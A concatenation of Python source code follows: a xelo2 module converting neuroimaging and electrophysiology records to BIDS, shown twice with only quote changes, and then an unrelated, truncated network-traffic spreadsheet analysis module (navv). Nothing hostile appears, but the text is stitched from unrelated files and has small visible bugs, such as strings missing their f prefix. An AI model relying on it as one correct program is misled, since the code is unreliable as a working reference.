from PyQt5.QtSql import QSqlQuery
from ..api import list_subjects, Run
from .mri import convert_mri
from .ephys import convert_ephys
from .physio import convert_physio
from .events import convert_events
from .utils import rename_task, prepare_subset, add_extra_fields_to_json
from .templates import (
JSON_PARTICIPANTS,
JSON_SESSIONS,
)
# protocols
PROTOCOL_HEALTHY = [
'16-816',
]
lg = getLogger(__name__)
def create_bids(db, data_path, deface=True, subset=None, keep_phase=False):
if subset is not None:
subset = add_intended_for(db, subset)
subset_subj = set(subset['subjects'])
subset_sess = set(subset['sessions'])
subset_run = set(subset['runs'])
data_path = Path(data_path)
if data_path.exists():
rmtree(data_path, ignore_errors=True)
data_path.mkdir(parents=True, exist_ok=True)
# the dataset_description.json is used by find_root, in some subscripts
_make_dataset_description(data_path)
intendedfor = {}
scans_json = {}
participants = []
for subj in list_subjects(db):
bids_name = {
'sub': None,
'ses': None,
'task': None,
'acq': None,
'rec': None,
'dir': None,
'run': None,
'recording': None, # only for physiology
}
if subset is not None and subj.id not in subset_subj:
continue
# use relative date based on date_of_signature
reference_dates = [p.date_of_signature for p in subj.list_protocols()]
reference_dates = [date for date in reference_dates if date is not None]
if len(reference_dates) == 0:
lg.warning(f'You need to add at least one research protocol with dates for {subj.codes}')
lg.info('Using date of the first task performed by the subject')
reference_dates = [x.start_time for x in subj.list_sessions() if x.start_time is not None]
if len(reference_dates):
reference_date = min(reference_dates).date()
else:
reference_date = datetime(2000, 1, 1, 12, 0, 0) # if no task has dates, then use a random date
else:
reference_date = max(reference_dates)
lg.info(f'Adding {subj.codes}')
codes = subj.codes
if len(codes) == 0:
code = 'id{subj.id}' # use id if code is empty
else:
code = codes[0]
bids_name['sub'] = 'sub-' + code
subj_path = data_path / bids_name['sub']
subj_path.mkdir(parents=True, exist_ok=True)
if subj.date_of_birth is None:
lg.warning(f'You need to add date_of_birth to {subj.codes}')
age = 'n/a'
else:
age = (reference_date - subj.date_of_birth).days // 365.2425
age = f'{age:.0f}'
patient_or_healthy = 'patient'
for p in subj.list_protocols():
if p.metc in PROTOCOL_HEALTHY:
patient_or_healthy = 'healthy'
participants.append({
'participant_id': bids_name['sub'],
'sex': subj.sex,
'age': age,
'group': patient_or_healthy,
})
sess_count = defaultdict(int)
sess_files = []
for sess in subj.list_sessions():
sess_count[_make_sess_name(sess)] += 1 # also count the sessions which are not included
if subset is not None and sess.id not in subset_sess:
continue
bids_name['ses'] = f'ses-{_make_sess_name(sess)}{sess_count[_make_sess_name(sess)]}'
sess_path = subj_path / bids_name['ses']
sess_path.mkdir(parents=True, exist_ok=True)
lg.info(f'Adding {bids_name['sub']} / {bids_name['ses']}')
sess_files.append({
'session_id': bids_name['ses'],
'resection': 'n/a',
'implantation': 'no',
})
if sess.name in ('IEMU', 'OR', 'CT'):
sess_files[-1]['implantation'] = 'yes'
run_count = defaultdict(int)
run_files = []
for run in sess.list_runs():
run_count[run.task_name] += 1 # also count the runs which are not included
if subset is not None and run.id not in subset_run:
continue
if len(run.list_recordings()) == 0:
lg.warning(f'No recordings for {subj.codes}/{run.task_name}')
continue
acquisition = get_bids_acquisition(run)
bids_name['run'] = f'run-{run_count[run.task_name]}'
if acquisition in ('ieeg', 'eeg', 'meg', 'func'):
bids_name['task'] = f'task-{rename_task(run.task_name)}'
else:
bids_name['task'] = None
mod_path = sess_path / acquisition
mod_path.mkdir(parents=True, exist_ok=True)
lg.info(f'Adding {bids_name['sub']} / {bids_name['ses']} / {acquisition} / {bids_name['task']} ({run})')
data_name = None
for rec in run.list_recordings():
# dir can only go with bold and epi modality
if rec.modality in ('bold', 'epi') and rec.PhaseEncodingDirection is not None:
bids_name['dir'] = 'dir-' + rec.PhaseEncodingDirection
else:
bids_name['dir'] = None
if rec.modality in ('bold', 'T1w', 'T2w', 'T2star', 'PD', 'FLAIR', 'angio', 'epi'):
data_name = convert_mri(run, rec, mod_path, c(bids_name), deface)
elif rec.modality in ('ieeg', 'eeg', 'meg'):
if run.duration is None:
lg.warning(f'You need to specify duration for {subj.codes}/{run}')
continue
data_name = convert_ephys(run, rec, mod_path, c(bids_name), intendedfor)
elif rec.modality == 'physio':
if data_name is None:
lg.warning('physio only works after another recording modality')
elif acquisition == 'fmap':
lg.info('physio was recorded but BIDS says that it should not be included in fmap')
else:
convert_physio(rec, mod_path, c(bids_name))
else:
lg.warning(f'Unknown modality {rec.modality} for {rec}')
continue
if data_name is not None and acquisition in ('ieeg', 'eeg', 'meg', 'func'):
convert_events(run, mod_path, c(bids_name))
if data_name is not None and rec.modality != 'physio': # secondary modality
intendedfor[run.id] = data_name
fields = {
'filename': data_name,
'acq_time': _set_date_to_1900(reference_date, run.start_time).isoformat(timespec='seconds'),
}
run_files.append(add_extra_fields_to_json(run, fields, scans_json))
if len(run_files) == 0:
continue
tsv_file = sess_path / f'{bids_name['sub']}_{bids_name['ses']}_scans.tsv'
if run_files:
_list_scans(tsv_file, c(run_files), sess_path)
tsv_file = subj_path / f'{bids_name['sub']}_sessions.tsv'
if sess_files:
_list_scans(tsv_file, sess_files, data_path)
json_sessions = tsv_file.with_suffix('.json')
copy(JSON_SESSIONS, json_sessions) # https://github.com/bids-standard/bids-validator/issues/888
# add IntendedFor for top_up scans
_add_intendedfor(db, data_path, intendedfor)
# remove phase because we get lots of warnings from BIDS
if not keep_phase:
remove_phase(data_path)
# here the rest
if len(scans_json) > 0:
with (data_path / 'scans.json').open('w') as f:
dump(scans_json, f, ensure_ascii=False, indent=' ')
_make_README(data_path)
tsv_file = data_path / 'participants.tsv'
_list_scans(tsv_file, participants, data_path)
json_participants = tsv_file.with_suffix('.json')
copy(JSON_PARTICIPANTS, json_participants)
_make_bids_config(data_path)
def _list_scans(tsv_file, scans, root_dir):
"""
Parameters
----------
"""
if 'filename' in scans[0]:
for scan in scans:
scan['filename'] = str(scan['filename'].relative_to(root_dir))
cols = _find_columns(scans)
with tsv_file.open('w') as f:
f.write('\t'.join(cols) + '\n')
for scan in scans:
values = []
for k in cols:
values.append(scan.get(k, 'n/a'))
f.write('\t'.join(values) + '\n')
def _make_dataset_description(data_path):
"""Generate general description of the dataset
Parameters
----------
data_path : Path
root BIDS directory
"""
d = {
"Name": data_path.name,
"BIDSVersion": "1.2.1",
"License": "CC0",
"Authors": [
"Giovanni Piantoni",
"Nick Ramsey",
],
"Acknowledgements": "",
"HowToAcknowledge": '',
"Funding": [
],
"ReferencesAndLinks": ["", ],
"DatasetDOI": ""
}
with (data_path / 'dataset_description.json').open('w') as f:
dump(d, f, ensure_ascii=False, indent=' ')
def get_bids_acquisition(run):
for recording in run.list_recordings():
modality = recording.modality
if modality == 'ieeg':
return 'ieeg'
elif modality == 'eeg':
return 'eeg'
elif modality == 'meg':
return 'meg'
elif modality in ('T1w', 'T2w', 'T2star', 'FLAIR', 'PD', 'angio'):
return 'anat'
elif modality in ('bold', 'phase'):
return 'func'
elif modality in ('epi', ):
return 'fmap'
elif modality in ('ct', ):
return 'ct'
raise ValueError(f'I cannot determine BIDS folder for {repr(run)}')
def add_intended_for(db, subset):
run_t1w = add_intended_for_elec(db, subset)
run_topup = add_intended_for_topup(db, subset)
intendedfor = run_t1w + run_topup
if len(intendedfor) == 0:
return subset
else:
intendedfor_str = ', '.join(str(x) for x in intendedfor)
run_id_sql = f'`runs`.`id` in ({intendedfor_str})'
return prepare_subset(db, run_id_sql, subset=subset)
def add_intended_for_topup(db, subset):
"""Add topup"""
topups = []
for run_id in subset['runs']:
query = QSqlQuery(db['db'])
query.prepare("SELECT run_id FROM intended_for WHERE target = :targetid")
query.bindValue(':targetid', run_id)
if not query.exec():
raise SyntaxError(query.lastError().text())
while query.next():
topups.append(query.value('run_id'))
return topups
def add_intended_for_elec(db, subset):
"""Electrodes also need the reference T1w images, so we add it here"""
reference_t1w = []
for run_id in subset['runs']:
run = Run(db, id=run_id)
for rec in run.list_recordings():
electrodes = rec.electrodes
if electrodes is not None:
t1w_id = electrodes.IntendedFor
if t1w_id is not None:
reference_t1w.append(t1w_id)
return reference_t1w
def _make_bids_config(data_path):
d = {
"ignore": [
"INCONSISTENT_SUBJECTS", # different tasks
"INCONSISTENT_PARAMETERS", # different tasks
"SLICETIMING_ELEMENTS", # https://github.com/bids-standard/bids-validator/issues/1111
"MISSING_SESSION", # not all subjects have the same sessions
],
"warn": [],
"error": [],
"ignoredFiles": [
]
}
with (data_path / '.bids-validator-config.json').open('w') as f:
dump(d, f, ensure_ascii=False, indent=' ')
def _make_README(data_path):
with (data_path / 'README').open('w') as f:
f.write('Converted with xelo2')
def _set_date_to_1900(base_date, datetime_of_interest):
if datetime_of_interest is None: # run.start_time is null
return datetime(1900, 1, 1, 0, 0, 0)
else:
return datetime.combine(
date(1900, 1, 1) + (datetime_of_interest.date() - base_date),
datetime_of_interest.time())
def _make_sess_name(sess):
if sess.name == 'MRI':
MagneticFieldStrength = sess.MagneticFieldStrength
if MagneticFieldStrength is None:
lg.warning(f'Please specify Magnetic Field Strength for {sess}')
sess_name = 'mri'
elif MagneticFieldStrength == '1.5T': # we cannot use 1.5 in session name
sess_name = 'mri'
else:
sess_name = MagneticFieldStrength.lower()
else:
sess_name = sess.name.lower()
return sess_name
def _add_intendedfor(db, bids_dir, intendedfor):
for run_id, relative_path in intendedfor.items():
targets = find_intendedfor(db, run_id) # find all the targets
targets = set(targets) & set(intendedfor) # only targets in this dataset
if len(targets) == 0:
continue
fields = []
for target_id in targets:
target_file = intendedfor[target_id]
target_file = target_file.relative_to(bids_dir)
# remove sub- from the path (note the inconsistency between fieldmaps and T1w/elec)
target_file = target_file.relative_to(target_file.parts[0])
fields.append(str(target_file))
json_file = replace_extension(bids_dir / relative_path, '.json')
_add_intendedfor_to_json(json_file, fields)
def _add_intendedfor_to_json(json_file, fields):
if json_file.exists():
with json_file.open() as f:
sidecar = load(f)
else:
lg.warning('Adding IntendedFor to {json_file}, but this file does not exist')
sidecar = {}
sidecar['IntendedFor'] = fields
with json_file.open('w') as f:
dump(sidecar, f, indent=2)
def find_intendedfor(db, run_id):
query = QSqlQuery(db['db'])
query.prepare("SELECT target FROM intended_for WHERE run_id = :runid")
query.bindValue(':runid', run_id)
if not query.exec():
raise SyntaxError(query.lastError().text())
topups = []
while query.next():
topups.append(query.value('target'))
return topups
def remove_phase(bids_dir):
"""I cannot specify phase.json so we get lots of errors when including phase.nii.gz
https://github.com/bids-standard/bids-validator/issues/1074
"""
for phase in bids_dir.rglob('*_phase.nii.gz'):
phase.unlink()
def _find_columns(scans):
cols = []
for fields in scans:
for k in fields:
if k not in cols:
cols.append(k)
return cols
| from json import dump, load
from pathlib import Path
from copy import copy as c
from collections import defaultdict
from logging import getLogger
from datetime import date, datetime
from shutil import copy, rmtree
from bidso.utils import replace_extension
from PyQt5.QtSql import QSqlQuery
from ..api import list_subjects, Run
from .mri import convert_mri
from .ephys import convert_ephys
from .physio import convert_physio
from .events import convert_events
from .utils import rename_task, prepare_subset, add_extra_fields_to_json
from .templates import (
JSON_PARTICIPANTS,
JSON_SESSIONS,
)
# protocols
PROTOCOL_HEALTHY = [
'16-816',
]
lg = getLogger(__name__)
def create_bids(db, data_path, deface=True, subset=None, keep_phase=False):
if subset is not None:
subset = add_intended_for(db, subset)
subset_subj = set(subset['subjects'])
subset_sess = set(subset['sessions'])
subset_run = set(subset['runs'])
data_path = Path(data_path)
if data_path.exists():
rmtree(data_path, ignore_errors=True)
data_path.mkdir(parents=True, exist_ok=True)
# the dataset_description.json is used by find_root, in some subscripts
_make_dataset_description(data_path)
intendedfor = {}
scans_json = {}
participants = []
for subj in list_subjects(db):
bids_name = {
'sub': None,
'ses': None,
'task': None,
'acq': None,
'rec': None,
'dir': None,
'run': None,
'recording': None, # only for physiology
}
if subset is not None and subj.id not in subset_subj:
continue
# use relative date based on date_of_signature
reference_dates = [p.date_of_signature for p in subj.list_protocols()]
reference_dates = [date for date in reference_dates if date is not None]
if len(reference_dates) == 0:
lg.warning(f'You need to add at least one research protocol with dates for {subj.codes}')
lg.info('Using date of the first task performed by the subject')
reference_dates = [x.start_time for x in subj.list_sessions() if x.start_time is not None]
if len(reference_dates):
reference_date = min(reference_dates).date()
else:
reference_date = datetime(2000, 1, 1, 12, 0, 0) # if no task has dates, then use a random date
else:
reference_date = max(reference_dates)
lg.info(f'Adding {subj.codes}')
codes = subj.codes
if len(codes) == 0:
code = 'id{subj.id}' # use id if code is empty
else:
code = codes[0]
bids_name['sub'] = 'sub-' + code
subj_path = data_path / bids_name['sub']
subj_path.mkdir(parents=True, exist_ok=True)
if subj.date_of_birth is None:
lg.warning(f'You need to add date_of_birth to {subj.codes}')
age = 'n/a'
else:
age = (reference_date - subj.date_of_birth).days // 365.2425
age = f'{age:.0f}'
patient_or_healthy = 'patient'
for p in subj.list_protocols():
if p.metc in PROTOCOL_HEALTHY:
patient_or_healthy = 'healthy'
participants.append({
'participant_id': bids_name['sub'],
'sex': subj.sex,
'age': age,
'group': patient_or_healthy,
})
sess_count = defaultdict(int)
sess_files = []
for sess in subj.list_sessions():
sess_count[_make_sess_name(sess)] += 1 # also count the sessions which are not included
if subset is not None and sess.id not in subset_sess:
continue
bids_name['ses'] = f'ses-{_make_sess_name(sess)}{sess_count[_make_sess_name(sess)]}'
sess_path = subj_path / bids_name['ses']
sess_path.mkdir(parents=True, exist_ok=True)
lg.info(f'Adding {bids_name["sub"]} / {bids_name["ses"]}')
sess_files.append({
'session_id': bids_name['ses'],
'resection': 'n/a',
'implantation': 'no',
})
if sess.name in ('IEMU', 'OR', 'CT'):
sess_files[-1]['implantation'] = 'yes'
run_count = defaultdict(int)
run_files = []
for run in sess.list_runs():
run_count[run.task_name] += 1 # also count the runs which are not included
if subset is not None and run.id not in subset_run:
continue
if len(run.list_recordings()) == 0:
lg.warning(f'No recordings for {subj.codes}/{run.task_name}')
continue
acquisition = get_bids_acquisition(run)
bids_name['run'] = f'run-{run_count[run.task_name]}'
if acquisition in ('ieeg', 'eeg', 'meg', 'func'):
bids_name['task'] = f'task-{rename_task(run.task_name)}'
else:
bids_name['task'] = None
mod_path = sess_path / acquisition
mod_path.mkdir(parents=True, exist_ok=True)
lg.info(f'Adding {bids_name["sub"]} / {bids_name["ses"]} / {acquisition} / {bids_name["task"]} ({run})')
data_name = None
for rec in run.list_recordings():
# dir can only go with bold and epi modality
if rec.modality in ('bold', 'epi') and rec.PhaseEncodingDirection is not None:
bids_name['dir'] = 'dir-' + rec.PhaseEncodingDirection
else:
bids_name['dir'] = None
if rec.modality in ('bold', 'T1w', 'T2w', 'T2star', 'PD', 'FLAIR', 'angio', 'epi'):
data_name = convert_mri(run, rec, mod_path, c(bids_name), deface)
elif rec.modality in ('ieeg', 'eeg', 'meg'):
if run.duration is None:
lg.warning(f'You need to specify duration for {subj.codes}/{run}')
continue
data_name = convert_ephys(run, rec, mod_path, c(bids_name), intendedfor)
elif rec.modality == 'physio':
if data_name is None:
lg.warning('physio only works after another recording modality')
elif acquisition == 'fmap':
lg.info('physio was recorded but BIDS says that it should not be included in fmap')
else:
convert_physio(rec, mod_path, c(bids_name))
else:
lg.warning(f'Unknown modality {rec.modality} for {rec}')
continue
if data_name is not None and acquisition in ('ieeg', 'eeg', 'meg', 'func'):
convert_events(run, mod_path, c(bids_name))
if data_name is not None and rec.modality != 'physio': # secondary modality
intendedfor[run.id] = data_name
fields = {
'filename': data_name,
'acq_time': _set_date_to_1900(reference_date, run.start_time).isoformat(timespec='seconds'),
}
run_files.append(add_extra_fields_to_json(run, fields, scans_json))
if len(run_files) == 0:
continue
tsv_file = sess_path / f'{bids_name["sub"]}_{bids_name["ses"]}_scans.tsv'
if run_files:
_list_scans(tsv_file, c(run_files), sess_path)
tsv_file = subj_path / f'{bids_name["sub"]}_sessions.tsv'
if sess_files:
_list_scans(tsv_file, sess_files, data_path)
json_sessions = tsv_file.with_suffix('.json')
copy(JSON_SESSIONS, json_sessions) # https://github.com/bids-standard/bids-validator/issues/888
# add IntendedFor for top_up scans
_add_intendedfor(db, data_path, intendedfor)
# remove phase because we get lots of warnings from BIDS
if not keep_phase:
remove_phase(data_path)
# here the rest
if len(scans_json) > 0:
with (data_path / 'scans.json').open('w') as f:
dump(scans_json, f, ensure_ascii=False, indent=' ')
_make_README(data_path)
tsv_file = data_path / 'participants.tsv'
_list_scans(tsv_file, participants, data_path)
json_participants = tsv_file.with_suffix('.json')
copy(JSON_PARTICIPANTS, json_participants)
_make_bids_config(data_path)
def _list_scans(tsv_file, scans, root_dir):
"""
Parameters
----------
"""
if 'filename' in scans[0]:
for scan in scans:
scan['filename'] = str(scan['filename'].relative_to(root_dir))
cols = _find_columns(scans)
with tsv_file.open('w') as f:
f.write('\t'.join(cols) + '\n')
for scan in scans:
values = []
for k in cols:
values.append(scan.get(k, 'n/a'))
f.write('\t'.join(values) + '\n')
def _make_dataset_description(data_path):
"""Generate general description of the dataset
Parameters
----------
data_path : Path
root BIDS directory
"""
d = {
"Name": data_path.name,
"BIDSVersion": "1.2.1",
"License": "CC0",
"Authors": [
"Giovanni Piantoni",
"Nick Ramsey",
],
"Acknowledgements": "",
"HowToAcknowledge": '',
"Funding": [
],
"ReferencesAndLinks": ["", ],
"DatasetDOI": ""
}
with (data_path / 'dataset_description.json').open('w') as f:
dump(d, f, ensure_ascii=False, indent=' ')
def get_bids_acquisition(run):
for recording in run.list_recordings():
modality = recording.modality
if modality == 'ieeg':
return 'ieeg'
elif modality == 'eeg':
return 'eeg'
elif modality == 'meg':
return 'meg'
elif modality in ('T1w', 'T2w', 'T2star', 'FLAIR', 'PD', 'angio'):
return 'anat'
elif modality in ('bold', 'phase'):
return 'func'
elif modality in ('epi', ):
return 'fmap'
elif modality in ('ct', ):
return 'ct'
raise ValueError(f'I cannot determine BIDS folder for {repr(run)}')
def add_intended_for(db, subset):
run_t1w = add_intended_for_elec(db, subset)
run_topup = add_intended_for_topup(db, subset)
intendedfor = run_t1w + run_topup
if len(intendedfor) == 0:
return subset
else:
intendedfor_str = ', '.join(str(x) for x in intendedfor)
run_id_sql = f'`runs`.`id` in ({intendedfor_str})'
return prepare_subset(db, run_id_sql, subset=subset)
def add_intended_for_topup(db, subset):
"""Add topup"""
topups = []
for run_id in subset['runs']:
query = QSqlQuery(db['db'])
query.prepare("SELECT run_id FROM intended_for WHERE target = :targetid")
query.bindValue(':targetid', run_id)
if not query.exec():
raise SyntaxError(query.lastError().text())
while query.next():
topups.append(query.value('run_id'))
return topups
def add_intended_for_elec(db, subset):
"""Electrodes also need the reference T1w images, so we add it here"""
reference_t1w = []
for run_id in subset['runs']:
run = Run(db, id=run_id)
for rec in run.list_recordings():
electrodes = rec.electrodes
if electrodes is not None:
t1w_id = electrodes.IntendedFor
if t1w_id is not None:
reference_t1w.append(t1w_id)
return reference_t1w
def _make_bids_config(data_path):
d = {
"ignore": [
"INCONSISTENT_SUBJECTS", # different tasks
"INCONSISTENT_PARAMETERS", # different tasks
"SLICETIMING_ELEMENTS", # https://github.com/bids-standard/bids-validator/issues/1111
"MISSING_SESSION", # not all subjects have the same sessions
],
"warn": [],
"error": [],
"ignoredFiles": [
]
}
with (data_path / '.bids-validator-config.json').open('w') as f:
dump(d, f, ensure_ascii=False, indent=' ')
def _make_README(data_path):
with (data_path / 'README').open('w') as f:
f.write('Converted with xelo2')
def _set_date_to_1900(base_date, datetime_of_interest):
if datetime_of_interest is None: # run.start_time is null
return datetime(1900, 1, 1, 0, 0, 0)
else:
return datetime.combine(
date(1900, 1, 1) + (datetime_of_interest.date() - base_date),
datetime_of_interest.time())
def _make_sess_name(sess):
if sess.name == 'MRI':
MagneticFieldStrength = sess.MagneticFieldStrength
if MagneticFieldStrength is None:
lg.warning(f'Please specify Magnetic Field Strength for {sess}')
sess_name = 'mri'
elif MagneticFieldStrength == '1.5T': # we cannot use 1.5 in session name
sess_name = 'mri'
else:
sess_name = MagneticFieldStrength.lower()
else:
sess_name = sess.name.lower()
return sess_name
def _add_intendedfor(db, bids_dir, intendedfor):
for run_id, relative_path in intendedfor.items():
targets = find_intendedfor(db, run_id) # find all the targets
targets = set(targets) & set(intendedfor) # only targets in this dataset
if len(targets) == 0:
continue
fields = []
for target_id in targets:
target_file = intendedfor[target_id]
target_file = target_file.relative_to(bids_dir)
# remove sub- from the path (note the inconsistency between fieldmaps and T1w/elec)
target_file = target_file.relative_to(target_file.parts[0])
fields.append(str(target_file))
json_file = replace_extension(bids_dir / relative_path, '.json')
_add_intendedfor_to_json(json_file, fields)
def _add_intendedfor_to_json(json_file, fields):
if json_file.exists():
with json_file.open() as f:
sidecar = load(f)
else:
lg.warning('Adding IntendedFor to {json_file}, but this file does not exist')
sidecar = {}
sidecar['IntendedFor'] = fields
with json_file.open('w') as f:
dump(sidecar, f, indent=2)
def find_intendedfor(db, run_id):
query = QSqlQuery(db['db'])
query.prepare("SELECT target FROM intended_for WHERE run_id = :runid")
query.bindValue(':runid', run_id)
if not query.exec():
raise SyntaxError(query.lastError().text())
topups = []
while query.next():
topups.append(query.value('target'))
return topups
def remove_phase(bids_dir):
"""I cannot specify phase.json so we get lots of errors when including phase.nii.gz
https://github.com/bids-standard/bids-validator/issues/1074
"""
for phase in bids_dir.rglob('*_phase.nii.gz'):
phase.unlink()
def _find_columns(scans):
cols = []
for fields in scans:
for k in fields:
if k not in cols:
cols.append(k)
return cols
|
#!/usr/bin/env python3
# Copyright 2021 Battelle Energy Alliance, LLC
import os
import itertools
from collections import Counter
import socket
from copy import copy
import pkg_resources
import pickle
import string
import openpyxl
import openpyxl.styles
from openpyxl.worksheet.table import Table
import netaddr
from tqdm import tqdm
from navv import data_types
from navv import utilities
DATA_PKL_FILE = pkg_resources.resource_filename(__name__, "data/data.pkl")
COL_NAMES = [
"Count",
"Src_IP",
"Src_Desc",
"Dest_IP",
"Dest_Desc",
"Port",
"Service",
"Proto",
"Conn_State",
"Notes",
]
HEADER_STYLE = openpyxl.styles.NamedStyle(
name="header_style",
font=openpyxl.styles.Font(name="Calibri", size=11, bold=True),
fill=openpyxl.styles.PatternFill("solid", fgColor="4286F4"),
)
IPV6_CELL_COLOR = (
openpyxl.styles.PatternFill("solid", fgColor="FFFFFF"),
openpyxl.styles.Font(name="Calibri", size=11, color="ff0000"),
)
EXTERNAL_NETWORK_CELL_COLOR = (
openpyxl.styles.PatternFill("solid", fgColor="030303"),
openpyxl.styles.Font(name="Calibri", size=11, color="ffff00"),
)
INTERNAL_NETWORK_CELL_COLOR = (
openpyxl.styles.PatternFill("solid", fgColor="ffff00"),
openpyxl.styles.Font(name="Calibri", size=11, color="000000"),
)
ICMP_CELL_COLOR = (
openpyxl.styles.PatternFill("solid", fgColor="ff33cc"),
openpyxl.styles.Font(name="Calibri", size=11, color="000000"),
)
UNKNOWN_EXTERNAL_CELL_COLOR = (
openpyxl.styles.PatternFill("solid", fgColor="ffffff"),
openpyxl.styles.Font(name="Calibri", size=11, color="000000"),
)
ALREADY_UNRESOLVED = list()
def get_workbook(file_name):
"""Create the blank Inventory and Segment sheets for data input into the tool"""
if os.path.isfile(file_name):
wb = openpyxl.load_workbook(file_name)
else:
wb = openpyxl.Workbook()
inv_sheet = wb.active
inv_sheet.title = "Inventory"
seg_sheet = wb.create_sheet("Segments")
inv_sheet.cell(row=1, column=1, value="IP").style = HEADER_STYLE
inv_sheet.cell(row=1, column=2, value="Name").style = HEADER_STYLE
seg_sheet.cell(row=1, column=1, value="Name").style = HEADER_STYLE
seg_sheet.cell(row=1, column=2, value="Description").style = HEADER_STYLE
seg_sheet.cell(row=1, column=3, value="CIDR").style = HEADER_STYLE
return wb
@utilities.timeit
def get_inventory_data(ws, **kwargs):
inventory = dict()
for row in itertools.islice(ws.iter_rows(), 1, None):
if not row[0].value or not row[1].value:
continue
inventory[row[0].value] = data_types.InventoryItem(
ip=row[0].value,
name=row[1].value,
color=(copy(row[0].fill), copy(row[0].font)),
)
return inventory
@utilities.timeit
def get_segments_data(ws):
segments = list()
for row in itertools.islice(ws.iter_rows(), 1, None):
if not row[2].value:
continue
segments.append(
data_types.Segment(
name=row[0].value,
description=row[1].value,
network=row[2].value,
color=[copy(row[0].fill), copy(row[0].font)],
)
)
all_ips = []
for segment in segments:
all_ips = all_ips + segment.network
segments.append(all_ips)
return segments
def get_package_data():
"""Load services and conn_states data into memory"""
with open(DATA_PKL_FILE, "rb") as f:
services, conn_states = pickle.load(f)
return services, conn_states
@utilities.timeit
def create_analysis_array(sort_input, **kwargs):
arr = list()
mac_dict = dict()
# sort by count and source IP
counted = sorted(
list(str(count) + "\t" + item for item, count in sorted(Counter(sort_input).items(), key=lambda x: x[0])),
key=lambda x: int(x.split("\t")[0]),
reverse=True,
)
for row in counted:
cells = row.split("\t")
arr.append(
data_types.AnalysisRowItem(
count=cells[0],
src_ip=cells[1],
dest_ip=cells[2],
port=cells[3],
proto=cells[4],
conn=cells[5],
)
)
if cells[6] is not None and cells[6] != "":
if netaddr.IPAddress(cells[1]).is_private():
if cells[6] not in mac_dict:
mac_dict[cells[6]] = [cells[1]]
else:
if cells[1] not in mac_dict[cells[6]]:
mac_dict[cells[6]].append(cells[1])
return arr, mac_dict
@utilities.timeit
def perform_analysis(
wb,
rows,
services,
conn_states,
inventory,
segments,
dns_data,
pkl_path,
ext_IPs,
unk_int_IPs,
**kwargs,
):
sheet = make_sheet(wb, "Analysis", idx=0)
sheet.append(
[
"Count",
"Src_IP",
"Src_Desc",
"Dest_IP",
"Dest_Desc",
"Port",
"Service",
"Proto",
"Conn_State",
"Notes",
]
)
print("Performing analysis(including lookups). This may take a while:")
for row_index, row in enumerate(tqdm(rows), start=2):
row.src_desc = handle_ip(row.src_ip, dns_data, inventory, segments, ext_IPs, unk_int_IPs)
row.dest_desc = handle_ip(row.dest_ip, dns_data, inventory, segments, ext_IPs, unk_int_IPs)
handle_service(row, services)
row.conn = (row.conn, conn_states[row.conn])
write_row_to_sheet(row, row_index, sheet)
tab = Table(displayName="AnalysisTable", ref=f"A1:J{len(rows)+1}")
sheet.add_table(tab)
# pickle the lookupdata for future use
with open(pkl_path, "wb") as pkl:
pickle.dump(dns_data, pkl)
def write_row_to_sheet(row, row_index, sheet):
sheet.cell(row=row_index, column=1, value=int(row.count))
src_IP = sheet.cell(row=row_index, column=2, value=row.src_ip)
src_IP.fill = row.src_desc[1][0]
src_IP.font = row.src_desc[1][1]
src_Desc = sheet.cell(row=row_index, column=3, value=row.src_desc[0])
src_Desc.fill = row.src_desc[1][0]
src_Desc.font = row.src_desc[1][1]
dest_IP = sheet.cell(row=row_index, column=4, value=row.dest_ip)
dest_IP.fill = row.dest_desc[1][0]
dest_IP.font = row.dest_desc[1][1]
dest_Desc = sheet.cell(row=row_index, column=5, value=row.dest_desc[0])
dest_Desc.fill = row.dest_desc[1][0]
dest_Desc.font = row.dest_desc[1][1]
sheet.cell(row=row_index, column=6, value=int(row.port))
service = sheet.cell(row=row_index, column=7, value=row.service[0])
service.fill = row.service[1][0]
service.font = row.service[1][1]
sheet.cell(row=row_index, column=8, value=row.proto)
conn_State = sheet.cell(row=row_index, column=9, value=row.conn[0])
conn_State.fill = row.conn[1][0]
conn_State.font = row.conn[1][1]
# placeholder for notes cell
sheet.cell(row=row_index, column=10, value="")
def handle_service(row, services):
# { port: { proto: (name, (fill, font)} }
if row.port in services and row.proto in services[row.port]:
row.service = services[row.port][row.proto]
else:
if row.proto == "icmp":
if netaddr.valid_ipv4(row.src_ip):
row.proto = "ICMPv4"
service_dict = data_types.icmp4_types
else:
row.proto = "ICMPv6"
service_dict = data_types.icmp6_types
if row.port in service_dict:
row.service = (service_dict[row.port], ICMP_CELL_COLOR)
else:
row.service = ("unknown icmp", ICMP_CELL_COLOR)
else:
row.service = ("unknown service", UNKNOWN_EXTERNAL_CELL_COLOR)
def handle_ip(ip_to_check, dns_data, inventory, segments, ext_IPs, unk_int_IPs):
"""Function take IP Address and uses collected dns_data, inventory, and segment information to give IP Addresses in analysis context.
Priority flow:
* DHCP Broadcasting
* Multicast
* Within Segments identified
* Within Inventory, not within an Identified Segment
* Private Network
* External (Public IP space) or Internet
This will capture the name description and the color coding identified within the worksheet.
"""
#
if ip_to_check == str("0.0.0.0"):
desc_to_change = (
"Unassigned IPv4",
IPV6_CELL_COLOR,
)
elif ip_to_check == str("255.255.255.255"):
desc_to_change = (
"IPv4 All Subnet Broadcast",
IPV6_CELL_COLOR,
)
elif netaddr.valid_ipv6(ip_to_check) or netaddr.IPAddress(ip_to_check).is_multicast():
desc_to_change = (
f"{"IPV6" if netaddr.valid_ipv6(ip_to_check) else "IPV4"}{"_Multicast" if netaddr.IPAddress(ip_to_check).is_multicast() else ""}",
IPV6_CELL_COLOR,
)
elif ip_to_check in segments[len(segments) - 1]:
for segment in segments[:-1]:
if ip_to_check not in segment.network:
continue
if ip_to_check in dns_data:
desc_to_change = (dns_data[ip_to_check], segment.color)
if ip_to_check in inventory:
desc_to_change = (inventory[ip_to_check].name, segment.color)
else:
desc_to_change = (
f"Unknown device in {segment.name} network",
segment.color,
)
unk_int_IPs.add(ip_to_check)
elif ip_to_check in inventory:
desc_to_change = (inventory[ip_to_check].name, inventory[ip_to_check].color)
elif netaddr.IPAddress(ip_to_check).is_private():
if ip_to_check in dns_data:
desc_to_change = (dns_data[ip_to_check], INTERNAL_NETWORK_CELL_COLOR)
else:
desc_to_change = ("Unknown Internal address", INTERNAL_NETWORK_CELL_COLOR)
unk_int_IPs.add(ip_to_check)
else:
ext_IPs.add(ip_to_check)
if ip_to_check in dns_data:
resolution = dns_data[ip_to_check]
else:
try:
resolution = socket.gethostbyaddr(ip_to_check)[0]
except socket.herror:
resolution = "Unresolved external address"
ALREADY_UNRESOLVED.append(ip_to_check)
finally:
dns_data[ip_to_check] = resolution
